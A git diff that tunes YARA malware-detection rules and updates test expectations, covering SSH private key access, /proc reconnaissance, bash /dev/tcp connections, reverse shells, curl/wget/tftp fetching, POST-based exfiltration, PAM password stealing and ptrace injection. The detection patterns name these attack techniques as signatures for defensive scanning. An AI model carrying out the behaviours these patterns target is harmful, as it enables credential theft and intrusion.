b/rules/credential/ssh/ssh.yara @@ -26,19 +26,19 @@ rule id_rsa: medium { filesize < 10MB and ssh_folder and $id_rsa } - rule id_rsa_not_ssh: high { meta: description = "non-SSH client accessing SSH private keys" strings: - $id_rsa = "id_rsa" fullword - $not_ssh_newkeys = "SSH_MSG" - $not_ssh_userauth = "SSH_USERAUTH" - $not_ssh_20 = "SSH-2.0" - $not_openssh = "OpenSSH" - $not_ssh2 = "SSH2" fullword - $not_SSH_AUTH_SOCK = "SSH_AUTH_SOCK" + $id_rsa = "id_rsa" fullword + $not_ssh_newkeys = "SSH_MSG" + $not_ssh_userauth = "SSH_USERAUTH" + $not_ssh_20 = "SSH-2.0" + $not_openssh = "OpenSSH" + $not_ssh2 = "SSH2" fullword + $not_SSH_AUTH_SOCK = "SSH_AUTH_SOCK" + condition: filesize < 10MB and ssh_folder and $id_rsa and none of ($not*) } diff --git a/rules/discover/process/name-get.yara b/rules/discover/process/name.yara similarity index 100% rename from rules/discover/process/name-get.yara rename to rules/discover/process/name.yara diff --git a/rules/discover/process/parent_pid-get.yara b/rules/discover/process/parent.yara similarity index 100% rename from rules/discover/process/parent_pid-get.yara rename to rules/discover/process/parent.yara diff --git a/rules/discover/system/dev_full.yara b/rules/discover/system/dev_full.yara new file mode 100644 index 000000000..5cf54b19a --- /dev/null +++ b/rules/discover/system/dev_full.yara @@ -0,0 +1,10 @@ +rule dev_full: medium linux { + meta: + description = "tests full disk behavior" + + strings: + $val = "/dev/full" fullword + + condition: + $val +} diff --git a/rules/discover/system/proc.yara b/rules/discover/system/proc.yara new file mode 100644 index 000000000..b9c2e8ecf --- /dev/null +++ b/rules/discover/system/proc.yara @@ -0,0 +1,20 @@ +rule proc_multiple: high { + meta: + description = "accesses an unusual assortment of /proc files" + + strings: + $ref = /\/proc\/[%{$][\/\$\w\}]{0,12}/ + $stat = "/proc/stat" + $net_den = "/proc/net/dev" + $proc_exe = "/proc/%d/exe" + $proc_kernel_v = "/proc/sys/kernel/version" + $proc_kernel_osrelease = "/proc/sys/kernel/osrelease" + $proc_self_maps = "/proc/self/maps" + $proc_ngroups_max = "/proc/sys/kernel/ngroups_max" + $proc_rtsig_max = "/proc/sys/kernel/rtsig-max" + $proc_meminfo = "/proc/meminfo" + $proc_cpuinfo = "/proc/cpuinfo" + + condition: + filesize < 2MB and int32(0) == 1179403647 and 80 % of them +} diff --git a/rules/discover/system/system_network.yara b/rules/discover/system/system_network.yara index 9e7677b65..09410e974 100644 --- a/rules/discover/system/system_network.yara +++ b/rules/discover/system/system_network.yara @@ -49,13 +49,15 @@ private rule obfuscate { private rule exfil { strings: - $f_b64decode = "application/json" - $f_post = "requests.post" - $f_nsurl = "NSURLRequest" - $f_curl = /curl.{0,32}-X POST/ + $f_app_json = "application/json" + $f_post = "requests.post" + $f_nsurl = "NSURLRequest" + $f_curl = /curl.{0,32}-X POST/ + + $not_requests_utils = "requests.utils" condition: - filesize < 512KB and any of them + filesize < 512KB and any of ($f*) and none of ($not*) } rule sys_net_recon_exfil: high { @@ -63,8 +65,9 @@ rule sys_net_recon_exfil: high { description = "may exfiltrate collected system and network information" strings: - $not_curl = "CURLAUTH_ONLY" + $not_curl = "CURLAUTH_ONLY" + $not_cloudinit = "cloudinit" fullword condition: - sys_net_recon and (obfuscate or exfil) and none of ($not*) + sys_net_recon and obfuscate and exfil and none of ($not*) } diff --git a/rules/evasion/file/location/chdir-unusual.yara b/rules/evasion/file/location/chdir-unusual.yara index 78b3d4d44..ffacd7992 100644 --- a/rules/evasion/file/location/chdir-unusual.yara +++ b/rules/evasion/file/location/chdir-unusual.yara @@ -76,7 +76,8 @@ rule cd_var_subdir: high { $d_var_run = "cd /var/run" $d_var_tmp = "cd /var/tmp" - $not_var_log_packages = "cd /var/log/packages" + $not_var_log_packages = "cd /var/log/packages" + condition: any of ($d*) and none of ($not*) } @@ -105,7 +106,7 @@ rule unusual_cd_dev: high { hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" strings: - $d_dev = /cd \/dev[\w\/\.]{0,64}/ + $d_dev = /cd \/dev\/[\w\/\.]{1,64}/ $makedev = "MAKEDEV" condition: diff --git a/rules/evasion/file/location/x11-unix.yara b/rules/evasion/file/location/x11-unix.yara index dd36e841f..9145dc33a 100644 --- a/rules/evasion/file/location/x11-unix.yara +++ b/rules/evasion/file/location/x11-unix.yara @@ -20,7 +20,8 @@ rule X11: override { $X11_space = "/etc/X11/" $X11R6 = "X11R6/share" $XForwarding = "X11 forwarding" - $X = "/tmp/.X11-unix/X" fullword + $X = "/tmp/.X11-unix/X" fullword + condition: filesize < 10MB and any of them } diff --git a/rules/evasion/file/prefix/prefix.yara b/rules/evasion/file/prefix/prefix.yara index c16702d5a..a2b1df3e3 100644 --- a/rules/evasion/file/prefix/prefix.yara +++ b/rules/evasion/file/prefix/prefix.yara @@ -42,7 +42,7 @@ rule hidden_short_path: high { description = "hidden short path in a system directory" strings: - $crit = /[\w\/\.]{0,32}\/(tmp|usr\/\w{0,8}|bin|lib|LaunchAgents|lib64|var|etc|shm|mqueue|spool|log|Users|Movies|Music|WebServer|Applications|Shared|Library|System)\/\.\w[\w\-\.]{0,2}/ fullword + $crit = /[\w\/\.]{0,32}\/(usr\/\w{0,8}|bin|lib|LaunchAgents|lib64|var|etc|shm|mqueue|spool|log|Users|Movies|Music|WebServer|Applications|Shared|Library|System)\/\.\w[\w\-\.]{0,2}/ fullword $not_network_manager = "org.freedesktop.NetworkManager" $not_private = "/System/Library/PrivateFrameworks/" $not_X11 = "/tmp/.X11-unix" diff --git a/rules/evasion/file/prefix/tmp.yara b/rules/evasion/file/prefix/tmp.yara new file mode 100644 index 000000000..ef978adeb --- /dev/null +++ b/rules/evasion/file/prefix/tmp.yara @@ -0,0 +1,17 @@ +rule hidden_short_path: high { + meta: + description = "hidden short path in a temp directory" + + strings: + $crit = /[\w\/\.]{0,32}\/tmp\/\.\w[\w\-\.]{0,2}/ fullword + $not_network_manager = "org.freedesktop.NetworkManager" + $not_private = "/System/Library/PrivateFrameworks/" + $not_X11 = "/tmp/.X11-unix" + $not_XIM = "/tmp/.XIM-unix" + $not_cpp = "/tmp/.cpp.err" + $not_ice = "SESSION_MANAGER" fullword + $not_md = "/dev/.tmp.md.%d:%d:%d" + + condition: + $crit and none of ($not*) +} diff --git a/rules/evasion/hijack_execution/etc-ld.so.preload.yara b/rules/evasion/hijack_execution/etc-ld.so.preload.yara index 7f4ffe56a..5e3375b92 100644 --- a/rules/evasion/hijack_execution/etc-ld.so.preload.yara +++ b/rules/evasion/hijack_execution/etc-ld.so.preload.yara @@ -25,7 +25,8 @@ rule etc_ld_preload_not_ld: high linux { $not_env_hwcap = "LD_HWCAP_MASK" $not_env_audit = "LD_AUDIT" $not_cache = "ld.so.cache" - $not_man = "MAN_DISABLE_SECCOMP" + $not_man = "MAN_DISABLE_SECCOMP" + condition: $ref and none of ($not*) } diff --git a/rules/evasion/logging/dev_log.yara b/rules/evasion/logging/dev_log.yara new file mode 100644 index 000000000..db2901e44 --- /dev/null +++ b/rules/evasion/logging/dev_log.yara @@ -0,0 +1,10 @@ +rule full: medium linux { + meta: + description = "device where local syslog messages are read" + + strings: + $val = "/dev/log" fullword + + condition: + $val +} diff --git a/rules/evasion/logging/syslog.yara b/rules/evasion/logging/syslog.yara index 613ecc599..f2bb2e030 100644 --- a/rules/evasion/logging/syslog.yara +++ b/rules/evasion/logging/syslog.yara @@ -22,6 +22,7 @@ rule var_log_syslog_elf: high { $not_syslog_conf = "/etc/syslog.conf" $not_rsyslog_conf = "/etc/rsyslog.conf" $not_rsyslog = "RSYSLOG" fullword + $not_top = "~/.toprc" condition: filesize < 1MB and uint32(0) == 1179403647 and any of ($ref*) and none of ($not*) diff --git a/rules/evasion/mimicry/fake-library.yara b/rules/evasion/mimicry/fake-library.yara index 3da69deac..fe93f4c0b 100644 --- a/rules/evasion/mimicry/fake-library.yara +++ b/rules/evasion/mimicry/fake-library.yara @@ -33,8 +33,9 @@ rule libc_fake_number_val: high { hash_2023_uacert_refs = "106eef08f3bfcced3e221ee6f789792650386d7794d30c80eae19e42ef893682" strings: - $ref = /libc.so.[2345789]/ - $not_go_example = "libc.so.96.1" + $ref = /libc.so.[2345789]/ + $not_go_example = "libc.so.96.1" + condition: $ref and none of ($not*) } diff --git a/rules/evasion/net/http_443.yara b/rules/evasion/net/http_443.yara index a874c3047..7d4913ba9 100644 --- a/rules/evasion/net/http_443.yara +++ b/rules/evasion/net/http_443.yara @@ -7,7 +7,8 @@ rule http_port_443: high { $not_test = "assertEqual" $not_example = "http://example.com:443" $not_localhost = "http://localhost:443" - $not_foo = "http://foo.com:443/" + $not_foo = "http://foo.com:443/" + condition: $http_443 and none of ($not*) } diff --git a/rules/evasion/process_injection/ptrace.yara b/rules/evasion/process_injection/ptrace.yara index f9331847e..50ad34eec 100644 --- a/rules/evasion/process_injection/ptrace.yara +++ b/rules/evasion/process_injection/ptrace.yara @@ -19,13 +19,28 @@ rule ptrace_injector: high { hash_2024_procinject_infect = "cb7c09e58c5314e0429ace2f0e1f3ebd0b802489273e4b8e7531ea41fa107973" strings: - $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/ - $ptrace = "ptrace" fullword - $proc = "process" fullword + $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/ + $ptrace = "ptrace" fullword + $proc = "process" fullword + + condition: + filesize < 67108864 and $maps and $ptrace and $proc +} + +rule known_ptrace_injectors: override { + meta: + description = "known" + ptrace_injector = "medium" + proc_d_exe_high = "medium" + + strings: $not_qemu = "QEMU_IS_ALIGNED" $not_chromium = "CHROMIUM_TIMESTAMP" $not_crashpad = "CRASHPAD" fullword + $not_perf = "PERF_SAMPLE" fullword + $not_trace = "TRACE_REQ" fullword + $not_bpf = "BPF" fullword condition: - filesize < 67108864 and $maps and $ptrace and $proc and none of ($not*) + any of them } diff --git a/rules/evasion/rootkit/linux_kernel.yara b/rules/evasion/rootkit/linux_kernel.yara index d870340b9..76fbdddd9 100644 --- a/rules/evasion/rootkit/linux_kernel.yara +++ b/rules/evasion/rootkit/linux_kernel.yara @@ -41,7 +41,8 @@ rule lkm_dirent: high { $linux = "Linux" $not_syscalls = "#define _LINUX_SYSCALLS_H" $not_itimer = "__kernel_old_itimerval" - $not_internal = "internal_getdents" + $not_internal = "internal_getdents" + condition: filesize < 2MB and all of ($l*) and none of ($not*) } diff --git a/rules/exec/shell/bash_dev_tcp.yara b/rules/exec/shell/bash_dev_tcp.yara index 7df0c2aeb..d0bc02be4 100644 --- a/rules/exec/shell/bash_dev_tcp.yara +++ b/rules/exec/shell/bash_dev_tcp.yara @@ -1,16 +1,14 @@ rule bash_dev_tcp: high exfil { meta: - description = "uses /dev/tcp for network access (bash)" - hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2" - hash_2023_usr_adxintrin_b = "a51a4ddcd092b102af94139252c898d7c1c48f322bae181bd99499a79c12c500" - hash_2023_spirit = "26ba215bcd5d8a9003a904b0eac7dc10054dba7bea9a708668a5f6106fd73ced" + description = "uses /dev/tcp for network access (bash)" strings: - $ref = "/dev/tcp" + $ref = /\/dev\/tcp[\/\w\.]{8,16}\/\d{1,6}/ $posixly_correct = "POSIXLY_CORRECT" $not_comment = "# Check that both our processes are running on their tcp port" $not_get = /GET \/ HTTP\/1.1\n{1,2} >/ $not_localhost_8080 = "/dev/tcp/127.0.0.1/8080" + $not_lsof = "/proc/tcp" fullword condition: $ref and not $posixly_correct and none of ($not*) diff --git a/rules/exec/shell/sighup_trap.yara b/rules/exec/shell/sighup_trap.yara index c2cc81895..235b5d272 100644 --- a/rules/exec/shell/sighup_trap.yara +++ b/rules/exec/shell/sighup_trap.yara @@ -6,9 +6,10 @@ rule trap_1: high { hash_2023_Linux_Malware_Samples_7a60 = "7a60c84fb34b2b3cd7eed3ecd6e4a0414f92136af656ed7d4460b8694f2357a7" strings: - $ref = "trap '' 1" - $ref2 = "trap \"\" 1" - $not_netcat_example = "ignore most signals; the parent will nuke the kid" + $ref = "trap '' 1" + $ref2 = "trap \"\" 1" + $not_netcat_example = "ignore most signals; the parent will nuke the kid" + condition: any of ($ref*) and none of ($not*) -} \ No newline at end of file +} diff --git a/rules/exfil/stealer/pam.yara b/rules/exfil/stealer/pam.yara index 4c7fa9238..1513b5e57 100644 --- a/rules/exfil/stealer/pam.yara +++ b/rules/exfil/stealer/pam.yara @@ -14,14 +14,15 @@ rule pam_passwords: high { $f_orig_auth = "orig_pam_authenticate" $f_getifaddrs = "getifaddrs" fullword $f_keylogger = "keylogger" - $f_tmp = "/tmp/" + $f_tmp = /\/tmp\/[\.\w\-]{2,}/ $f_ssh = "/bin/ssh" + $f_sshpass = "sshpass" $f_sendto = "sendto" fullword $not_pam_service = "--pam-service" $not_pam_acct = "pam_acct_mgmt" condition: - $auth and $pass and 2 of ($f*) and none of ($not*) + $auth and $pass and 3 of ($f*) and none of ($not*) } rule pam_passwords_rootkit: critical { diff --git a/rules/false_positives/libdw.yara b/rules/false_positives/libdw.yara index 36b0ac115..17fc183d8 100644 --- a/rules/false_positives/libdw.yara +++ b/rules/false_positives/libdw.yara @@ -1,7 +1,8 @@ rule libdw_override: override { meta: - description = "libdw.so" - ptrace_injector = "medium" + description = "libdw.so" + ptrace_injector = "medium" + strings: $dward = "invalid DWARF" diff --git a/rules/false_positives/linux_src.yara b/rules/false_positives/linux_src.yara index e922ad6da..6bc14ce4c 100644 --- a/rules/false_positives/linux_src.yara +++ b/rules/false_positives/linux_src.yara @@ -7,7 +7,6 @@ rule linux_test_script: override linux { hidden_short_path = "medium" kernel_module_loader = "medium" cd_root = "medium" - server_address = "medium" description = "Linux test script" strings: diff --git a/rules/false_positives/slirp.yara b/rules/false_positives/slirp.yara index 50032a2e1..87550ab83 100644 --- a/rules/false_positives/slirp.yara +++ b/rules/false_positives/slirp.yara @@ -3,6 +3,7 @@ rule slirp4netns: override linux { description = "slirp4netns" login_records = "medium" linux_critical_system_paths_high = "medium" + fetch_tool = "medium" strings: $auth = "SLIRP_DEBUG" diff --git a/rules/false_positives/snapd.yara b/rules/false_positives/snapd.yara index 3ef08dc4b..ffc913462 100644 --- a/rules/false_positives/snapd.yara +++ b/rules/false_positives/snapd.yara @@ -7,12 +7,15 @@ rule snapd: override linux { dev_mmc = "medium" busybox_runner = "medium" system_log_references = "medium" + hidden_x11 = "medium" filetypes = "elf,so" strings: $snapd_snapd = "SNAPD_SNAPD" $snapd = "snapcore/snapd" + $snapd_debug = "SNAPD_DEBUG" + $snap_name = "SNAP_NAME" fullword condition: - filesize > 15MB and filesize < 30MB and uint32(0) == 1179403647 and any of them + filesize > 1MB and filesize < 30MB and uint32(0) == 1179403647 and any of them } diff --git a/rules/false_positives/sudo.yara b/rules/false_positives/sudo.yara index f82b437a8..0fda2af79 100644 --- a/rules/false_positives/sudo.yara +++ b/rules/false_positives/sudo.yara @@ -1,10 +1,13 @@ rule sudo: override linux { meta: - description = "sudo" - proc_c_exe = "medium" + description = "sudo" + proc_c_exe = "medium" + small_elf_sudoer = "medium" + proc_d_exe_high = "medium" strings: - $ref = "SUDO_INTERCEPT_FD" + $ref = "SUDO_INTERCEPT_FD" + $ref2 = "SUDO_EDITOR" condition: any of them diff --git a/rules/false_positives/vmtools.yara b/rules/false_positives/vmtools.yara index d9525168e..2d5888698 100644 --- a/rules/false_positives/vmtools.yara +++ b/rules/false_positives/vmtools.yara @@ -3,12 +3,14 @@ rule vmtools: override { description = "vmtools" backdoor = "medium" linux_critical_system_paths_high = "medium" - proc_net_route_high = "medium" - proc_s_exe = "medium" - sys_net_recon_exfil = "medium" + proc_net_route_high = "medium" + proc_s_exe = "medium" + sys_net_recon_exfil = "medium" + strings: $vmtools = "VMTools" fullword $vmsupport = "VMSUPPORT" fullword + $vmware = "VMware" fullword condition: filesize < 1MB and uint32(0) == 1179403647 and any of them diff --git a/rules/fs/permission/permission-modify-dangerous.yara b/rules/fs/permission/permission-modify-dangerous.yara index e13faf533..5762cbc6a 100644 --- a/rules/fs/permission/permission-modify-dangerous.yara +++ b/rules/fs/permission/permission-modify-dangerous.yara @@ -22,7 +22,8 @@ rule chmod_dangerous_exec: high exfil { $not_chmod_01777 = "chmod 01777" $not_chromium = "CHROMIUM_TIMESTAMP" $not_var_tmp = "chmod 0777 /var/tmp" fullword - $not_extutils = "chmod 0777, [.foo.bar] doesn't work on VMS" + $not_extutils = "chmod 0777, [.foo.bar] doesn't work on VMS" + condition: filesize < 50MB and $ref and none of ($not*) } diff --git a/rules/fs/proc/arbitrary-pid.yara b/rules/fs/proc/arbitrary-pid.yara index 47419fd05..def32edf6 100644 --- a/rules/fs/proc/arbitrary-pid.yara +++ b/rules/fs/proc/arbitrary-pid.yara @@ -6,10 +6,10 @@ rule proc_arbitrary: medium { hash_2023_Downloads_98e7 = "98e7808bd5bfd72c08429ffe0ffb52ae54bce7e6389f17ae523e8ae0099489ab" strings: - $string_val = /\/proc\/[%{$][\/\$\w\}]{0,12}/ + $ref = /\/proc\/[%{$][\/\$\w\}]{0,12}/ condition: - any of them + $ref } rule pid_match: medium { diff --git a/rules/fs/proc/pid-exe.yara b/rules/fs/proc/pid-exe.yara index 6403f307e..6342a7595 100644 --- a/rules/fs/proc/pid-exe.yara +++ b/rules/fs/proc/pid-exe.yara @@ -3,8 +3,9 @@ rule proc_s_exe: high { description = "accesses underlying executable of other processes" strings: - $string = "/proc/%s/exe" fullword - $not_tool = /[Uu]sage:/ fullword + $string = "/proc/%s/exe" fullword + $not_tool = /[Uu]sage:/ fullword + condition: $string and none of ($not*) } @@ -16,11 +17,30 @@ rule proc_d_exe: medium { strings: $digit = "/proc/%d/exe" fullword $not_cgroup = "cgroup" fullword - $not_tool = /[Uu]sage:/ fullword + $not_tool = /[Uu]sage:/ fullword + condition: $digit and none of ($not*) } +rule proc_d_exe_high: high { + meta: + description = "accesses underlying executable of other processes" + + strings: + $ref = "/proc/%d/exe" fullword + + $o_sign = "/etc/init.d" + $o_net_dev = "/proc/net/dev" + $o_bash = "/bin/bash" + $o_tty = "/dev/tty" + $o_var_tmp = "/var/tmp" + $o_osrelease = "/proc/sys/kernel/osrelease" + + condition: + filesize < 5MB and $ref and any of ($o*) +} + rule proc_py_exe: high { meta: description = "accesses underlying executable of other processes" diff --git a/rules/hw/dev/kmem.yara b/rules/hw/dev/kmem.yara index 0f555caba..5110cda09 100644 --- a/rules/hw/dev/kmem.yara +++ b/rules/hw/dev/kmem.yara @@ -9,6 +9,7 @@ rule kmem: high bsd { // entries from include/paths.h $not_cshell = "_PATH_CSHELL" fullword $not_rwho = "_PATH_RWHODIR" fullword + $not_lsof = "lsof" fullword condition: $val and none of ($not*) diff --git a/rules/hw/dev/sd_mmc.yara b/rules/hw/dev/sd_mmc.yara index 16e8e5017..939fa1d9e 100644 --- a/rules/hw/dev/sd_mmc.yara +++ b/rules/hw/dev/sd_mmc.yara @@ -18,7 +18,8 @@ rule dev_mmc_ok: override { strings: $not_fwupd = "fu_firmware_set_id" $not_ipmi = "/dev/ipmi" - $not_grub = "GRUB" fullword + $not_grub = "GRUB" fullword + condition: dev_mmc and any of them } diff --git a/rules/hw/dev/ubi.yara b/rules/hw/dev/ubi.yara index bf858ad27..6756140a9 100644 --- a/rules/hw/dev/ubi.yara +++ b/rules/hw/dev/ubi.yara @@ -10,13 +10,16 @@ rule ubi: high linux { any of them } -rule expected_ubi_users : override { - meta: - ubi = "medium" - strings: - $libuboot = "libuboot" - $usage = "Usage:" - $ubi = "ubifs" fullword - condition: - filesize < 120KB and any of them -} \ No newline at end of file +rule expected_ubi_users: override { + meta: + ubi = "medium" + + strings: + $libuboot = "libuboot" + $usage = "Usage:" + $ubi = "ubifs" fullword + $UBI = "UBI version" + + condition: + filesize < 512KB and any of them +} diff --git a/rules/impact/degrade/firewall.yara b/rules/impact/degrade/firewall.yara index 929e2f263..86076f55d 100644 --- a/rules/impact/degrade/firewall.yara +++ b/rules/impact/degrade/firewall.yara @@ -18,7 +18,8 @@ rule selinux_firewall: high linux { $not_selinux_init = "SELINUX_INIT" $not_define = "#define" fullword $not_netlink = "NETLINK" fullword - $not_containerd = "containerd" fullword + $not_containerd = "containerd" fullword + condition: filesize < 1MB and $selinux and any of ($f*) and none of ($not*) } diff --git a/rules/impact/exploit/GCONV_PATH.yara b/rules/impact/exploit/GCONV_PATH.yara index f086ac0f1..ffb449398 100644 --- a/rules/impact/exploit/GCONV_PATH.yara +++ b/rules/impact/exploit/GCONV_PATH.yara @@ -1,4 +1,4 @@ -rule gconv_path: low { +rule gconv_path: harmless { meta: description = "references character conversion configuration" diff --git a/rules/impact/remote_access/backdoor.yara b/rules/impact/remote_access/backdoor.yara index 04a8ea70d..98612b88f 100644 --- a/rules/impact/remote_access/backdoor.yara +++ b/rules/impact/remote_access/backdoor.yara @@ -20,8 +20,10 @@ rule backdoor: high { strings: $ref = /[a-zA-Z\-_ \']{0,16}[bB]ackdoor[a-zA-Z\-_ ]{0,16}/ fullword - $not_vcpu = "VCPUInfoBackdoor" - $not_vmware = "gGuestBackdoorOps" + $not_vcpu = "VCPUInfoBackdoor" + $not_vmware = "gGuestBackdoorOps" + $not_comment = "# backdoor:" + condition: filesize < 40MB and any of them and not wordlist and none of ($not*) } diff --git a/rules/impact/remote_access/net_term.yara b/rules/impact/remote_access/net_term.yara index 53b6119d2..93a5f3c99 100644 --- a/rules/impact/remote_access/net_term.yara +++ b/rules/impact/remote_access/net_term.yara @@ -92,7 +92,8 @@ rule miner_kvryr_stak_alike: high { $f_execve = "execve" $f_numa = "NUMA" - $not_perf = "PERF_RECORD" + $not_perf = "PERF_RECORD" + condition: filesize < 12MB and all of ($f*) and none of ($not*) } diff --git a/rules/impact/remote_access/py_setuptools.yara b/rules/impact/remote_access/py_setuptools.yara index f58daf7d9..15134cf47 100644 --- a/rules/impact/remote_access/py_setuptools.yara +++ b/rules/impact/remote_access/py_setuptools.yara @@ -14,7 +14,7 @@ private rule pythonSetup { $not_distutils = "from distutils.errors import" condition: - filesize < 128KB and $setup and any of ($i*) and none of ($not*) + filesize < 128KB and $setup and any of ($i*) in (0..1024) and none of ($not*) } rule setuptools_oslogin: medium { diff --git a/rules/impact/remote_access/reverse_shell.yara b/rules/impact/remote_access/reverse_shell.yara index dbaaa9df1..457354201 100644 --- a/rules/impact/remote_access/reverse_shell.yara +++ b/rules/impact/remote_access/reverse_shell.yara @@ -32,8 +32,10 @@ rule possible_reverse_shell: medium { $sh_bash = "/bin/bash" $sh = "/bin/sh" + $not_uc2 = "ucs2reverse" + condition: - filesize < 4MB and any of ($sh*) and all of ($f*) + filesize < 4MB and any of ($sh*) and all of ($f*) and none of ($not*) } rule mkfifo_netcat: critical { diff --git a/rules/net/download/fetch.yara b/rules/net/download/fetch.yara index fe132d1d4..46f74f9d1 100644 --- a/rules/net/download/fetch.yara +++ b/rules/net/download/fetch.yara @@ -47,33 +47,33 @@ rule fetch_tool: medium { description = "calls a URL fetch tool" strings: - $t_curl_O = "curl -O" - $t_curl_o = "curl -o" - $t_wget = "wget -" - $t_wget_http = "wget http" - $t_quiet_output = "-q -O " - $t_kinda_curl_o = "url -o " - $t_kinda_curl_O = "url -O " - $t_kinda_curl_silent_insecure = "silent --insecure" - $t_kinda_curl_qk = /url.{0,4}-k -q/ - $t_ftp = "ftp -" - $t_tftp = "tftp " - $t_ftpget = "ftpget " fullword + $t_curl_O = /[a-z]url [-\w ]{0,8}-[oOk] [ \w\:\/\-\.]{0,32}/ + $t_wget = /wget [ \w\:\/\-\.]{4,32}/ + $t_curl_qk = /[a-z]url [-\w ]{0,16} -(-silent|q) -(-insecure|k) [ \w\:\/\-\.]{0,32}/ + $t_curl_kq = /[a-z]url [-\w ]{0,16} -(-insecure|k) -(-silent|q) [ \w\:\/\-\.]{0,32}/ + $t_tftp = /tftp [ \w\:\/\-\.]{0,32}/ condition: - filesize < 5MB and any of ($t_*) + filesize < 1MB and any of ($t_*) } -rule executable_calls_fetch_tool: high { +rule binary_calls_fetch_tool: high { meta: - description = "executable that calls a fetch tool" + description = "binary calls fetch tool" filetypes = "macho,elf" strings: - $not_tftp = "Illegal TFTP operation" + $t_curl_O = /[a-z]url [-\w ]{0,8}-[oOk] [ \w\:\/\-\.\"]{0,32}/ + $t_wget = /wget [ \w\:\/\-\.\"]{4,32}/ + $t_curl_qk = /[a-z]url [-\w ]{0,16} -(-silent|q) -(-insecure|k) [ \w\:\/\-\.\"]{0,32}/ + $t_curl_kq = /[a-z]url [-\w ]{0,16} -(-insecure|k) -(-silent|q) [ \w\:\/\-\.]{0,32}/ + $t_tftp = /tftp [ \w\:\/\-\.\"]{0,32}/ + + $not_tftp = "Illegal TFTP operation" + $not_tftp_err = "tftp error" condition: - filesize < 5MB and (elf or macho) and fetch_tool and none of ($not*) + filesize < 10MB and (elf or macho) and any of ($t*) and none of ($not*) } rule curl_agent_val: high { @@ -138,7 +138,7 @@ rule high_fetch_command_val: high { $not_s_key = "curl -s --key" $not_local = "curl -ks https://localhost" $not_continue = "--continue-at" - $not_pciid = "https://pci-ids.ucw.cz" + $not_pciid = "https://pci-ids.ucw.cz" $x_chmod = "chmod" fullword $x_Chmod = "Chmod" fullword diff --git a/rules/net/ftp/tftp.yara b/rules/net/ftp/tftp.yara new file mode 100644 index 000000000..b1f17f574 --- /dev/null +++ b/rules/net/ftp/tftp.yara @@ -0,0 +1,11 @@ +rule tftp { + meta: + description = "Trivial File Transfer Protocol (TFTP)" + + strings: + $ref = "tftp" fullword + $ref2 = "TFTP" fullword + + condition: + filesize < 1MB and any of them +} diff --git a/rules/persist/kernel_module/symbol-lookup.yara b/rules/persist/kernel_module/symbol-lookup.yara index c5e81ba18..f135f28a2 100644 --- a/rules/persist/kernel_module/symbol-lookup.yara +++ b/rules/persist/kernel_module/symbol-lookup.yara @@ -46,9 +46,10 @@ rule bpf: override linux { description = "libbpf" filetypes = "so,elf" kallsyms_lookup = "medium" + proc_d_exe_high = "medium" strings: - $ref = "BPF" fullword + $ref = "BPF" fullword $ref2 = "LIBBPF" fullword condition: diff --git a/rules/persist/sysv/sysv.yara b/rules/persist/sysv/sysv.yara new file mode 100644 index 000000000..aac9e05dc --- /dev/null +++ b/rules/persist/sysv/sysv.yara @@ -0,0 +1,11 @@ +rule sysv_persist: high { + meta: + description = "installs arbitrary files into SYSV-style init directories" + + strings: + $rc_d = "/etc/rc%d.d/S%d%s" + $init_d = "/etc/init.d/%s" + + condition: + filesize < 5MB and any of them +} diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple index d973aaddd..8837659fb 100644 --- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple +++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple @@ -2,7 +2,6 @@ 3P/threat_hunting/powershell: medium c2/addr/ip: medium c2/addr/server: medium -c2/server_address: medium collect/archives/unarchive: medium collect/databases/mysql: medium collect/databases/postgresql: medium @@ -22,7 +21,7 @@ data/encoding/reverse: low data/random/insecure: low discover/group/lookup: medium discover/process/effective_groupid_get: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/processes/list: medium discover/system/hostname_get: low discover/system/platform: low diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple index fd567afc4..b1504d031 100644 --- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple +++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple @@ -2,7 +2,7 @@ 3P/threat_hunting/powershell: medium anti-static/obfuscation/js: medium c2/addr/ip: medium -c2/server_address: medium +c2/addr/server: medium collect/archives/unarchive: medium collect/databases/mysql: medium collect/databases/postgresql: medium @@ -23,7 +23,7 @@ data/hash/md5: low data/random/insecure: low discover/group/lookup: medium discover/process/effective_groupid_get: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/processes/list: medium discover/system/hostname_get: low discover/system/platform: low diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple index a6b8442a6..17b967ce3 100644 --- a/tests/javascript/clean/mode-php.js.simple +++ b/tests/javascript/clean/mode-php.js.simple @@ -12,7 +12,7 @@ data/encoding/reverse: low data/hash/md5: low data/random/insecure: low discover/process/effective_groupid_get: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple index 5bb3f1e5c..054657623 100644 --- a/tests/javascript/clean/mode-php_laravel_blade.js.simple +++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple @@ -12,7 +12,7 @@ data/encoding/reverse: low data/hash/md5: low data/random/insecure: low discover/process/effective_groupid_get: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple index a4cf97734..3b7669d02 100644 --- a/tests/javascript/clean/php.js.simple +++ b/tests/javascript/clean/php.js.simple @@ -10,7 +10,7 @@ data/encoding/base64: low data/encoding/reverse: low data/random/insecure: low 